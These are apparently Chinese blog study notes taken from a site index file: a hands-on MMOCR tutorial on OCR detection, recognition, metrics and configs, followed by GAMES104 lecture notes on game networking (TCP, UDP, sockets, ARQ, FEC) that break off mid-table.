OCR 即光学字符识别,包含文本区域检测、文本内容识别和关键信息提取。

    webp

​对于文本识别,又分为文档文本识别和场景文本识别。

    webp

    ​文本图像可能存在噪音、复杂背景、多语种、倾斜、弯曲、多形状和多种字体等属性,是 OCR 的难点与挑战。

    webp

    ​一般的 OCR 系统流程分为两种:

• 两步方法
      • 文本区域检测-裁剪出文本区域-文本内容识别
    • 端到端方法
      • 一个统一网络同时完成文本检测和文本识别两个任务

    学会 MMOCR 能做什么

    webp

    webp

    webp

    webp

    webp

    ​清华本科特奖的一个项目。

    webp

    webp

    关键信息提取是 OCR 的下游任务之一。

    webp

    webp

    开源 OCR 算法库:MMOCR

    webp

    ​上述下游任务的实现有些需要调用第三方 API,如果我们想使用自己的数据集进行训练、无限量地使用等,开源的 OCR 算法库是一个好的解决方案。

    webp

    ​MMOCR 集成了若干顶会所提出的前沿算法。

    webp

    ​各种算法的简介和使用方法可以在官方文档中找到。

    webp

    ​MMOCR 所包含的文本区域检测算法:

    • MaskRCNN
    • PAN
    • PSENet
    • DB
    • TextSnake
    • DRRG
    • FCENet

    webp

    ​MMOCR 所包含的文本内容识别算法:

    • CRNN
• RobustScanner
    • SAR
    • SegOCR
    • Transformer
    • ABINet
    • SATRN

    webp

    webp

    ​MMOCR 包含的 OCR 下游任务——Text Understanding 文本内容理解算法:

    • Key Information Extraction: SDMG-R 关键信息提取
    • Named Entity Recognition: Bert-softmax 命名实体识别

    webp

    ​MMOCR 依赖于 MMDetection 和 MMCV。

    webp

    ​MMOCR 具有模块化设计。

    webp

    webp

    ​MMOCR 所包含的功能:

    • 数据集
      • 常用 OCR 数据集及格式转换工具
    • 训练
      • 单机训练
      • 多机训练
      • 集群训练
      • Slurm 调度器
    • 测试
      • 主流性能评估指标
      • FLOPS 评估
      • 速度评估
    • 可视化
      • 文本检测
      • 文本识别
      • 关键信息提取
    • 部署(便于部署到实际应用中)
      • 导出为 ONNX
      • ONNX 转 TensorRT

    webp

    ​文本区域检测算法的部署,在 OpenVino 中实时调用摄像头进行场景文本检测。

    常用 OCR 数据集和算法评估指标

    webp

    ​常用的文本检测和文本识别的数据集。

    webp

    ​用于场景文本识别的数据集 MJSynth,合成图片背景相对简单。

    webp

    webp

    webp

    webp

    ​数据集由图像和标注两部分组成,对文本检测而言,它的标注范式与图像分割非常类似,都是用多段线去包络一个文字区域。

    webp

    ​对于文本内容识别的任务,标注包含文件名和对应的文字内容。

    webp

    置信度(confidence)
    模型在检测过程中,一个目标上可能会出现多个框,每一个框会对应一个 confidence,confidence 阈值就是之后计算 TP,FP,TN,FN 等参数的界限;
    交并比(IOU)
    计算模型预测出的框和标签中标注的框的 IOU,IOU 用于判定目标是真目标还是假目标,大于 IOU 阈值的框会认定为 True,小于 IOU 阈值的检测框会认定为 False;
    计算 TP,FP,TN,FN

    • TP:大于 IOU 阈值且大于 confidence 阈值(实际是正样本,判定为正样本);(检测对了)
    • FP:小于 IOU 阈值且大于 confidence 阈值(实际是负样本,判定为正样本);(检测错了)
    • TN:小于 IOU 阈值且小于 confidence 阈值(实际是负样本,判定为负样本);(不用于计算)
    • FN:大于 IOU 阈值且小于 confidence 阈值(实际是正样本,判定为负样本);(没检测出来)
    • 文本检测

      • 基于 IoU 计算(预测区域和标记区域的交并集)
        • Precision: TP / (TP + FP) 查准率
        • Recall: TP / (TP + FN) 查全率,TP + FN 为所有正样本的数量
        • hmean:P 与 R 的调和平均数
    • 文本内容识别

      • 基于混淆矩阵计算(本质上是一个分类问题)
        • Accuracy
        • Precision
        • Recall
      • 基于编辑距离/莱文斯坦距离(Levenshtein)计算
        • 1-N.E.D

$$\mathrm{lev}_{a,b}(i,j)=\begin{cases}\max(i,j) & \mathrm{if~}\min(i,j)=0\\\min\begin{cases}\mathrm{lev}_{a,b}(i-1,j)+1\\\mathrm{lev}_{a,b}(i,j-1)+1\\\mathrm{lev}_{a,b}(i-1,j-1)+1_{(a_i\neq b_j)}\end{cases} & \mathrm{otherwise}\end{cases}$$
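
​依据上面的递推公式,可以用 Python 写一个最小的编辑距离实现,并据此计算 1-N.E.D(以下代码为笔者补充的示意,并非 MMOCR 的实现):

def levenshtein(a: str, b: str) -> int:
    # dp[i][j] 即 lev_{a,b}(i, j);边界:lev(i, 0) = i,lev(0, j) = j
    m, n = len(a), len(b)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        dp[i][0] = i
    for j in range(n + 1):
        dp[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,         # 删除
                           dp[i][j - 1] + 1,         # 插入
                           dp[i - 1][j - 1] + cost)  # 替换(字符相同则不加)
    return dp[m][n]

def one_minus_ned(pred: str, gt: str) -> float:
    # 1 - 归一化编辑距离(1-N.E.D),越接近 1 说明识别越准确
    return 1 - levenshtein(pred, gt) / max(len(pred), len(gt), 1)

print(one_minus_ned('scotlands', 'scotland'))  # 1 - 1/9 ≈ 0.889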

    webp

    webp

    ​MMOCR 中集成了各种评估指标。

    2

    ​从 TommyZihao/MMOCR_tutorials: Jupyter notebook tutorials for MMOCR (github.com) 获取文件。

    webp

    ​必须完成 A 才可以完成下面的内容!

    A 安装配置 MMOCR

    ​虚拟环境安装 jupyter notebook:在 conda 创建的虚拟环境中安装 jupyter 以及使用_conda 虚拟环境怎么连接 jupyter-CSDN 博客

    ​安装 MMOCR:[Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

    ​检查安装成功:

# 检查 Pytorch
import torch, torchvision
print('Pytorch 版本', torch.__version__)
print('CUDA 是否可用', torch.cuda.is_available())

Pytorch 版本 1.13.1+cu117
CUDA 是否可用 True

# 检查 mmcv
import mmcv
from mmcv.ops import get_compiling_cuda_version, get_compiler_version
print('MMCV 版本', mmcv.__version__)
print('CUDA 版本', get_compiling_cuda_version())
print('编译器版本', get_compiler_version())

MMCV 版本 2.1.0
CUDA 版本 11.7
编译器版本 MSVC 192930148

# 检查 mmocr
import mmocr
print('mmocr 版本', mmocr.__version__)

mmocr 版本 1.0.1

    B1 预训练模型预测-文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,rec='svtr-small' 使用 SVTR 模型进行文本识别:mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

​下载 https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,MMOCR 会自动下载权重并缓存到默认目录)

infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')

Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

    ​载入预测图像,就决定是你了:

    png

    ​场景文本识别模型只支持裁剪出文本区域的小图的识别。

    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, save_vis=True, return_vis=True)

    ​解析预测结果-文本内容及置信度

result.keys()

dict_keys(['predictions', 'visualization'])

result['predictions']

[{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]

    ​解析预测结果-可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png

    B2 预训练模型预测-文字区域检测

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

​载入模型,实例化 MMOCRInferencer,det='textsnake' 使用 TextSnake 模型进行文本检测:[文本检测模型 — MMOCR 1.0.1 文档](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr)。

​下载 https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth 并放到合适位置,使用 det_weights 设定模型位置(如果没有设定,MMOCR 会自动下载权重并缓存到默认目录)

    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, return_vis=True)

    ​解析预测结果-文字区域及置信度:

result.keys()

dict_keys(['predictions', 'visualization'])

    ​解析预测结果-文字区域可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png


    ​也可自行加载配置文件(Method)和对应的模型(Model):

    ​从这里下载:文本检测模型 — MMOCR 1.0.1 文档

infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')

Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

    ​预测结果虽然是长方形,但是似乎是检测到了弯曲文本,长方形是经过处理后得到的:

    png


    ​像如下模型:

infer = MMOCRInferencer(det='dbnet')

Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

    ​对于弯曲文本,则检测失败:

    png

    B3 预训练模型预测-端到端 OCR

    ​相当于对一张图片先进行场景文本检测,再进行场景文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入场景文本检测模型:DBNet 以及场景文本识别模型:svtr-small

infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
                        det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
                        rec='svtr-small')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测并获得结果:

result = infer(img_path, save_vis=True, return_vis=True)
result['predictions']
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]

    ​得到了文本实例、文本范围以及相应的置信度。

    ​可视化 OCR 结果(可以从 results/vis/ 文件夹下看到):

    jpg

    ​直接本地保存!

    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')

    B4 预训练模型预测-OCR 下游任务之 KIE

    ​KIE 即 Key Information Extraction,旨在从图像(或文本)中提取出关键信息。这里 MMOCR 选用了一个 SDMGR 算法,用于发票信息提取。

    jpeg

    ​一阵操作:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    infer = MMOCRInferencer(det='textsnake', rec='svtr-small', kie='SDMGR')
    img_path = './demo/demo_kie.jpeg'
    img_bgr = cv2.imread(img_path)

    result = infer(img_path, save_vis=True, return_vis=True)

    plt.imshow(result['visualization'][0])
    plt.show()

    jpg

​感觉这个算法就是对场景文本检测得到的框再做一次分类。

    jpg

    ​对自己的图片似乎也能识别出部分信息。


    ​之后简单介绍了一下场景文本检测和场景文本识别的模型:

webp
3

    【C1】训练自己的文本识别模型

    ​读取训练用的配置文件:

    from mmengine import Config

    cfg = Config.fromfile('./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py')

    ​配置文件及解析:

    ​这段 Python 代码主要用于配置文本检测模型的训练和测试管道,通常在深度学习框架(如 MMDetection 或类似项目)中使用。以下是对代码各部分的详细解释:

_base_ = [
    '_base_dbnet_resnet18_fpnc.py',               # 基础模型配置文件
    '../_base_/datasets/totaltext.py',            # 数据集配置文件
    '../_base_/default_runtime.py',               # 默认运行时配置
    '../_base_/schedules/schedule_sgd_1200e.py',  # 学习率调度配置
]
    • _base_ 列表包含几个基础配置文件的路径,这些文件定义了模型结构、数据集、运行时设置和训练计划等。
train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
        type='LoadOCRAnnotations',
        with_polygon=True,
        with_bbox=True,
        with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
        type='TorchVisionWrapper',
        op='ColorJitter',
        brightness=32.0 / 255,
        saturation=0.5),
    dict(
        type='ImgAugWrapper',
        args=[['Fliplr', 0.5],
              dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
        type='PackTextDetInputs',
        meta_keys=('img_path', 'ori_shape', 'img_shape'))
]
    • train_pipeline 定义了一系列处理步骤,用于训练数据的预处理:

      • 加载图像:从文件中读取图像,并忽略方向。

      • 加载 OCR 注释:加载与文本检测相关的信息(多边形、边界框和标签)。

      • 修复无效多边形:确保多边形至少包含 4 个顶点。

      • 颜色抖动:随机调整图像的亮度和饱和度,增强训练数据的多样性。

      • 图像增强:包括随机翻转、旋转和缩放。

      • 随机裁剪:根据最小边比进行随机裁剪。

      • 调整大小:将图像调整为 640 x 640 的大小,保持比例。

      • 填充:如果图像小于 640 x 640,则填充至该尺寸。

      • 打包输入:将处理后的图像和元数据打包成模型输入格式。

test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
        type='LoadOCRAnnotations',
        with_polygon=True,
        with_bbox=True,
        with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
        type='PackTextDetInputs',
        meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
]
• test_pipeline 与 train_pipeline 类似,但针对测试阶段进行了调整:

      • 图像被调整为 1333 x 736 的大小。

      • 同样加载 OCR 注释并修复无效多边形。

# dataset settings
totaltext_textdet_train = _base_.totaltext_textdet_train
totaltext_textdet_test = _base_.totaltext_textdet_test
totaltext_textdet_train.pipeline = train_pipeline
totaltext_textdet_test.pipeline = test_pipeline
    • 从基础配置中获取训练和测试数据集,并为它们指定相应的处理管道。
train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

test_dataloader = val_dataloader
• train_dataloader 和 val_dataloader 定义了训练和验证的数据加载器:

      • batch_size:每个批次的样本数量(训练为 16,验证为 1)。

      • num_workers:用于数据加载的工作线程数。

      • pin_memory:是否将数据加载到固定内存中,以加快 GPU 训练。

      • persistent_workers:在数据加载过程中保持工作线程持续运行。

      • sampler:数据的采样方式(训练时打乱顺序,验证时不打乱)。

auto_scale_lr = dict(base_batch_size=16)
    • 配置自动缩放学习率的选项,以便根据基础批次大小动态调整学习率。
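
​读取配置后,可以像访问属性一样修改字段,再保存成新的配置文件,方便训练前微调超参。以下为笔者补充的示意写法(字段名以上面的配置为准):

from mmengine import Config

cfg = Config.fromfile('./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py')

# 示意:按单卡小显存调小 batch size 与 worker 数,并同步 auto_scale_lr
cfg.train_dataloader.batch_size = 8
cfg.train_dataloader.num_workers = 4
cfg.auto_scale_lr = dict(base_batch_size=8)

# 保存修改后的配置,之后训练时指定该文件即可
cfg.dump('./configs/my_dbnet_totaltext.py')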
    ]]>
    @@ -960,7 +960,7 @@ /posts/GAMES104-Online%20Gaming%20Architecture/ - 资源

    课程

    第十八节:网络游戏的架构基础

    Online Gaming Architecture: Fundamentals

    网络游戏架构

    PLAY ANYWHERE WITH ANYONE

    与任何人随时随地玩游戏

    Game developers have never stopped exploring multiplayer online gaming

    游戏开发商从未停止探索多人在线游戏

    Challenges in Multiplayer Online Gaming

    多人联机游戏的挑战

    Consistency

    一致性

    • Network Synchronization

      网络同步

    Reliability

    可靠性

    • Network Latency

      网络延迟

    • Drop and Reconnect

      断线重连

    Security

    安全性

    • Cheats

      作弊

    • Accounts Hacked

      账户被黑客攻击

    Diversities

    多样性

    • Cross-Play

      交叉游戏

    • Rapid iteration

      快速迭代

    • Multiple Game Systems

      多游戏系统

    Complexities

    复杂性

    • High Concurrency

      高并发性

    • High Availability

      高可用性

    • High Performance

      高性能

    Network Protocols

    网络协议

    The Founding Fathers of the Internet

    互联网的创始人(一开始用于军事用途)

Designed the TCP/IP protocols and the internet architecture.

设计了 TCP/IP 协议和互联网架构。

In 1977 Cerf and Kahn will link three networks (packet radio, satellite, and the ARPANET) and prove the efficacy of their TCP/IP protocol in a dramatic round-the-world transmission from a moving vehicle, the SRI Packet Radio Research van.

1977 年,Cerf 和 Kahn 连接了三个网络(分组无线电、卫星和 ARPANET),并通过移动车辆(SRI 分组无线电研究车)完成的一次戏剧性环球传输,证明了 TCP/IP 协议的有效性。

How to communicate between two PCs

    • A and B must agree on the meaning of the bits being sent and received at many different levels, including

      A 和 B 必须就在许多不同级别发送和接收的比特的含义达成一致,包括

      • How many volts represents a 0 bit, and for a 1 bit?

        多少伏特代表 0 位,多少伏特代表 1 位?

      • How does receiver know which is the last bit?

        接收器如何知道哪个是最后一位?

      • How many bits long is a number?

        一个数字有多少位长?

    webp

    The Problem of Communication

    沟通问题

    webp

• Re-implement every application for every new underlying transmission medium?

  为每个新的底层传输介质重新实现每个应用程序?

• Change every application on any change to an underlying transmission medium?

  在底层传输介质发生任何变化时修改每个应用程序?

    • No! But how does the Internet design avoid this?

      不!但是,互联网设计是如何避免这种情况的呢?

    Solution: Layering

    解决方法:分层

    webp

• Intermediate layers provide a set of abstractions for applications and media

  中间层为应用程序和媒体提供了一组抽象

    • New applications or media only need implementation for intermediate layer’s interface

      新的应用程序或媒体只需要实现中间层的接口

    Layering in the internet - OSI Model

    互联网分层——OSI 模型

    Application 应用层

    • Provides functions to users 为用户提供功能

    Presentation 表示层

    • Converts different representations 转换不同的表示形式

    Session 会话层

    • Manages task dialogs 管理任务对话框

    Transport 传输层

    • Provides end-to-end delivery 提供端到端交付

    Network 网络层

    • Sends packets over multiple links 通过多个链路发送数据包

    Data Link 数据链路层

    • Sends frames of information 发送信息帧

    Physical 物理层

    • Sends bits as signals 以信号形式发送比特

    webp

    Network Socket-based Communication

    基于网络套接字的通信

    webp

    Socket

    套接字

    A software structure within a network node of a computer network that serves as an endpoint for sending and receiving data across the network.

    计算机网络的网络节点内的软件结构,用作通过网络发送和接收数据的端点。

A Socket is a combination of an IP Address and a Port Number.

    Socket 是 IP 地址和端口号的组合。

    webp

// server side
struct sockaddr_in saddr, caddr;
int sockfd, clen, isock;
unsigned short port = 80;

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    printf("Error creating socket\n");
    ...
}

memset(&saddr, '\0', sizeof(saddr));        // zero structure out
saddr.sin_family = AF_INET;                 // match the socket() call
saddr.sin_addr.s_addr = htonl(INADDR_ANY);  // bind to any local address
saddr.sin_port = htons(port);               // specify port to listen on

if (bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) {  // bind
    printf("Error binding\n");
    ...
}

if (listen(sockfd, 5) < 0) {  // listen for incoming connections
    printf("Error listening\n");
    ...
}

clen = sizeof(caddr);
if ((isock = accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 0) {  // accept one
    printf("Error accepting\n");
    ...
}

    Setup Socket

    安装套接字

    Both client and server need to setup the socket

    客户端和服务器都需要设置套接字

• Function

  int socket(int domain, int type, int protocol)

  • domain

    • AF_INET – IPV4

    • AF_INET6 – IPV6

  • type

    • SOCK_STREAM – TCP

    • SOCK_DGRAM – UDP

  • protocol

    • 0

• E.g.

  int sockfd = socket(AF_INET, SOCK_STREAM, 0)

    Transmission Control Protocol (TCP)

    传输控制协议(TCP)

    • Connection-Oriented

      面向连接

    • Reliable and Ordered

      可靠且有序

    • Flow Control

      流量控制

    • Congestion Control

      拥堵控制

    webp

    TCP Retransmission Mechanisms

    TCP 重传机制

    Duplicate ACKs

    重复 ACK

    • Senders sends packets and seqnos

      发送方发送数据包和序列号

      • 1,2, 3, 4, 5, 6, 7, 8
• Assume 5th packet (seqno 5) is lost, stream of ACKs will be

  假设第 5 个数据包(序列号 5)丢失,则 ACK 流将是

      • 1, 2, 3, 4, 4, 4, 4

    webp

    TCP congestion control

    TCP 拥塞控制

    • The congestion window (CWND) of TCP starts to grow from a small value

      TCP 的拥塞窗口(CWND)从一个小值开始增长

    • When congestion occurs, packet loss or timeout, CWND will be reduced according to a certain algorithm

      当发生拥塞、丢包或超时时,CWND 将根据特定算法减少

    • This leads to high delay and cause delay jitter

      这会导致高延迟并导致延迟抖动

    webp

As the main transmission protocol on the Internet, TCP congestion control is necessary, otherwise it will cause congestion collapse. TCP congestion control is the main congestion control measure on the Internet, and it is also the main cause of TCP performance problems.

    作为互联网上的主要传输协议,TCP 拥塞控制是必要的,否则会导致拥塞崩溃。TCP 拥塞控制是互联网上主要的拥塞控制措施,也是 TCP 性能问题的主要原因。

    User Datagram Protocol (UDP)

    用户数据报协议(UDP)

    David P. Reed

He was involved in the early development of TCP/IP, and was the designer of the User Datagram Protocol (UDP), though he finds this title “a little embarrassing”.

他参与了 TCP/IP 的早期开发,是**用户数据报协议(UDP)**的设计者,尽管他觉得这个头衔“有点尴尬”。

He was also one of the authors of the original paper about the end-to-end principle, End-to-End Arguments in System Design, published in 1984.

他也是 1984 年发表的关于端到端原理的原始论文 End-to-End Arguments in System Design 的作者之一。

    UDP Features

    UDP 功能

    UDP (User Datagram Protocol)

    UDP(用户数据报协议)

    • Connectionless

      无连接

• Unreliable and Unordered

  不可靠和无序

• NO Flow Control

  无流量控制

• NO Congestion Control

  无拥塞控制

    webp

Network Protocols Usage in Game

游戏中网络协议的使用

Games suitable for each protocol

适合使用各协议的游戏

• TCP

  炉石传说

• UDP

  守望先锋、CSGO

| | TCP | UDP |
| --- | --- | --- |
| Structure 结构 | Segments 数据段 | Datagrams 数据报 |
| Connection Model 连接模型 | Connection-Oriented 面向连接 | Connectionless 无连接 |
| Speed 速度 | Slow 慢 | Fast 快 |
| Reliability 可靠性 | Reliable 可靠 | Unreliable 不可靠 |
| Header 标头 | 20 Bytes | 8 Bytes |
| Data Transfer 数据传输 | Ordered 有序 | Unordered 无序 |
| Control 控制 | Flow Control 流量控制 | No Flow Control 无流量控制 |

    Reliable UDP

    可靠 UDP,在 UDP 的基础上加以改进。

    TCP is Not Time Critical

    TCP 不重视及时性

• TCP is the complex and heavyweight protocol. It provides reliable delivery and advanced features, but it has more overhead.

      TCP 是复杂而重量级的协议。它提供可靠的交付和高级功能,但开销更大。

    • TCP is a fair, traffic oriented protocol designed to improve bandwidth utilization. But it’s not designed for speed.

      TCP 是一种公平的、面向流量的协议,旨在提高带宽利用率。但它不是为速度而设计的。

• So why is TCP slow?

      为什么 TCP 很慢?

    UDP is Fast but Unreliable

    UDP 速度快但不可靠

    • UDP is lightweight and fast but unreliable, packet loss and disorder will occur.

      UDP 是轻量级和快速的,但不可靠,会发生数据包丢失和混乱。

    • How to achieve reliable and real-time communication?

      如何实现可靠和实时的通信?

    Why We Need to Customize Protocol

    为什么我们需要定制协议

    • Game Server

      游戏服务器

• Keep-alive connection (TCP)

        保持有效连接(TCP)

      • Need keep logic consistency in “order” (TCP)

        需要保持“顺序”(TCP)中的逻辑一致性

      • High responsive & low latency (UDP)

        高响应和低延迟(UDP)

      • Broadcast commonly used (UDP)

        常用广播(UDP)

    • Web Server

      Web 服务器

      • Handles the HTTP protocol

        处理 HTTP 协议

      • Delivers static web content e.g., HTML pages, files, images, video.

        提供静态网络内容,例如 HTML 页面、文件、图像、视频。

    Acknowledgement & Sequence Number

    确认和序列号

    • Positive acknowledgment (ACK) is a signal that is passed between communicating processes, computers, or devices to signify acknowledgment, or receipt of message

      **肯定应答(ACK)**是在通信进程、计算机或设备之间传递的信号,表示确认或收到消息

• Negative ACK (NACK or NAK) is a signal that is sent to reject a previously received message or to indicate some kind of error

      **否定 ACK(NACK 或 NAK)**是一种信号,用于拒绝之前接收到的消息或指示某种错误

• Sequence number (SEQ) is a counter used to keep track of every byte sent outward by a host

      **序列号(SEQ)**是一个计数器,用于跟踪主机向外发送的每个字节

• Timeouts: specified periods of time allowed to elapse before an acknowledgment is to be received

  超时:在收到确认之前允许经过的特定时间段

    Automatic Repeat Request (ARQ)

    自动重复请求(ARQ)

    An error-control method for data transmission that uses ACK and timeouts to achieve reliable data transmission over an unreliable communication channel.

    一种用于数据传输的错误控制方法,该方法使用 ACK 和超时来在不可靠的通信信道上实现可靠的数据传输。

If the sender does not receive an acknowledgment before the timeout, it re-transmits the packet until it receives an acknowledgment or exceeds a predefined number of retransmissions.

    如果发送方在超时之前没有收到确认,它会重新发送数据包,直到收到确认或超过预定义的重新传输次数。

    • Sliding window protocol

      滑动窗口协议

      • Stop-and-Wait ARQ

        停止并等待 ARQ

      • Go-Back-N ARQ

      • Selective Repeat ARQ

        选择性重复 ARQ

    Sliding Window Protocol

    滑动窗口协议

• Send multiple frames at a time, the number of frames to be sent is based on the window size

  一次发送多个帧,要发送的帧数基于窗口大小

• Each frame is numbered by sequence number

  每帧按序列号编号

• When the frame at the front of the window is received, the window slides

  当位于窗口最前端的帧被接收确认后,窗口向前滑动

    webp

    webp

    Stop-and-Wait ARQ

    停止并等待 ARQ

• Window size = 1

      窗口大小 = 1

    • After transmitting one frame, the sender waits for an ACK before transmitting the next frame

      发送一帧后,发送方在发送下一帧之前等待 ACK

    • If the ACK does not arrive after a certain time, the sender times out and retransmits the original frame

      如果 ACK 在特定时间后未到达,则发送方超时并重新传输原始帧

    • Poor utilization of bandwidth, poor performance

      带宽利用率低,性能差

    webp

    Go-Back-N ARQ

    • N is Sender’s Windows Size

      N 是发件人的窗口大小

    • The Receiver only sends cumulative ACK

      接收器仅发送累积 ACK

• If an ACK is not received within an agreed-upon time period, all frames in the current window are re-transmitted

  如果在商定的时间段内未收到 ACK,则重传当前窗口中的所有帧

    webp

    Selective Repeat ARQ

    选择性重复 ARQ

    • In Selective Repeat ARQ, only the damaged or lost frames are retransmitted

      在选择性重复 ARQ 中,只有损坏或丢失的帧会被重新传输

    • The receiver sends the ack of each frame, and the sender maintains the timeout time of each frame

      接收方发送每帧的 ack,发送方保持每帧的超时时间

• When the receiver receives a damaged packet, it will send a NACK. The sender will send/retransmit the frame for which the NACK is received

  当接收方收到损坏的数据包时,它将发送一个 NACK。发送方将发送/重传收到 NACK 的那一帧

    webp
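
​用一小段 Python 可以示意选择性重复 ARQ 的核心逻辑:每帧独立计时与确认,只重传超时或被 NACK 的帧(笔者补充的简化示意,省略了真实的网络收发):

import time

WINDOW = 4   # 发送窗口大小(假设值)
RTO = 0.2    # 单帧重传超时,单位秒(假设值)

class SelectiveRepeatSender:
    def __init__(self, frames):
        self.frames = frames   # 待发送的帧列表
        self.base = 0          # 窗口左边界:最小的未确认序号
        self.sent_at = {}      # 序号 -> 上次发送时刻
        self.acked = set()     # 已被单独确认的序号

    def pump(self, send):
        # 把窗口内未确认、且从未发送或已超时的帧(重)发出去
        now = time.monotonic()
        for seq in range(self.base, min(self.base + WINDOW, len(self.frames))):
            if seq in self.acked:
                continue
            if seq not in self.sent_at or now - self.sent_at[seq] > RTO:
                send(seq, self.frames[seq])
                self.sent_at[seq] = now

    def on_ack(self, seq):
        # 每帧单独确认;窗口左边界尽量右移
        self.acked.add(seq)
        while self.base in self.acked:
            self.base += 1

    def on_nack(self, seq):
        # 收到 NACK:清掉发送时刻,下次 pump 立刻重传该帧
        self.sent_at.pop(seq, None)

与 Go-Back-N 不同,某一帧丢失只会触发这一帧的重传,窗口内其余已确认的帧不会被重复发送。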

    Make UDP Reliable in Packet Loss Scenario

    在丢包情况下使 UDP 可靠

With the increase of packet loss rate and delay, reliable UDP gradually fails to meet transmission requirements. E.g., if the packet loss rate increases to 20%, reliable UDP still suffers from high delay.

随着丢包率和延迟的增加,可靠 UDP 逐渐无法满足传输要求。例如,如果丢包率增加到 20%,使用可靠 UDP 的延迟仍然很高。

    webp

    Forward Error Correction (FEC)

    前向纠错(FEC)

• The transmission of enough additional, redundant information with the primary data stream to reconstruct lost IP packets up to a certain extent

  与主数据流一起传输足够的附加冗余信息,以便在一定程度上重建丢失的 IP 数据包

    webp

    XOR-FEC

| A | B | A XOR B |
| --- | --- | --- |
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
